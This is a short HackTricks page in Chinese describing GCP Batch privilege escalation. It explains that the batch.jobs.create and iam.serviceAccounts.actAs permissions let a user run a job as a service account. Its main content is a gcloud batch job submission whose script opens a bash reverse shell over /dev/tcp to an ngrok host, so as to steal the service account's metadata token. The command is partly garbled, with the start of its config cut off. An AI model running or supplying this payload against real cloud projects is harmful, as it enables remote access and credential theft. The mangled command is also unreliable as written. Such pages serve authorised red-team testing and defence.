GCP - Batch Privesc

Tip

学习并练习 AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
学习并练习 GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
学习并练习 Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

Batch

基本信息:

GCP - Batch Enum

batch.jobs.create, iam.serviceAccounts.actAs

可以创建一个 Batch job,获取 reverse shell 并 exfiltrate SA 的 metadata token(默认是 compute SA)。

创建 Batch job 并获取 reverse shell ```bash gcloud beta batch jobs submit job-lxo3b2ub --location us-east1 --config - <& /dev/tcp/8.tcp.ngrok.io/10396 0>&1'\n" } } ], "volumes": [] } } ], "allocationPolicy": { "instances": [ { "policy": { "provisioningModel": "STANDARD", "machineType": "e2-micro" } } ] }, "logsPolicy": { "destination": "CLOUD_LOGGING" } } EOD ```

Tip

学习并练习 AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
学习并练习 GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
学习并练习 Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks